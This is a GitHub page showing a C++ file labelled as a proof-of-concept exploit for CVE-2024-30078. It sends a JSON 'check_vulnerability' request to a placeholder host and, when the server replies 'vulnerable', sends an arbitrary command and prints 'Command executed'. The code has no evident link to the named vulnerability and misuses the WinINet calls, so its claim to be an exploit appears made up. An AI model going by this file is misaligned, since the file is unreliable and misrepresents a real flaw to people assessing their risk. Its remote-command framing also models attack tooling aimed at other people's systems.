-
Notifications
You must be signed in to change notification settings - Fork 5
/
poc.cpp
71 lines (60 loc) · 2.63 KB
/
poc.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#include <windows.h>
#include <iostream>
#include <string>
#include <wininet.h>
#pragma comment(lib, "wininet.lib")
void trigger_exploit(const std::string& ip, int port, const std::string& endpoint, const std::string& command) {
HINTERNET hInternet = InternetOpen("CVE-2024-30078 PoC", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (!hInternet) {
std::cerr << "InternetOpen failed: " << GetLastError() << std::endl;
return;
}
std::string url = "http://" + ip + ":" + std::to_string(port) + endpoint;
HINTERNET hConnect = InternetOpenUrl(hInternet, url.c_str(), NULL, 0, INTERNET_FLAG_RELOAD, 0);
if (!hConnect) {
std::cerr << "InternetOpenUrl failed: " << GetLastError() << std::endl;
InternetCloseHandle(hInternet);
return;
}
// 构造用于检测漏洞的载荷
std::string payload = "{\"command\":\"check_vulnerability\",\"cve\":\"CVE-2024-30078\"}";
std::string headers = "Content-Type: application/json\r\n";
BOOL bRequest = HttpSendRequest(hConnect, headers.c_str(), headers.length(), (LPVOID)payload.c_str(), payload.length());
if (!bRequest) {
std::cerr << "HttpSendRequest failed: " << GetLastError() << std::endl;
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
return;
}
// 检查响应
char buffer[1024];
DWORD bytesRead;
std::string response;
while (InternetReadFile(hConnect, buffer, sizeof(buffer) - 1, &bytesRead) && bytesRead != 0) {
buffer[bytesRead] = '\0';
response += buffer;
}
if (response.find("\"vulnerable\":true") != std::string::npos) {
std::cout << "Vulnerability detected on " << ip << ":" << port << std::endl;
// 构造执行命令的载荷
payload = "{\"command\":\"" + command + "\"}";
bRequest = HttpSendRequest(hConnect, headers.c_str(), headers.length(), (LPVOID)payload.c_str(), payload.length());
if (bRequest) {
std::cout << "Command executed on " << ip << ":" << port << std::endl;
} else {
std::cerr << "Failed to execute command: " << GetLastError() << std::endl;
}
} else {
std::cout << "No vulnerability detected on " << ip << ":" << port << std::endl;
}
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
}
int main() {
std::string ip = "192.168.1.1"; // 替换为实际IP地址
int port = 80; // 替换为实际端口
std::string endpoint = "/check"; // 替换为实际端点地址
std::string command = "pwd"; // 替换为实际要执行的命令
trigger_exploit(ip, port, endpoint, command);
return 0;
}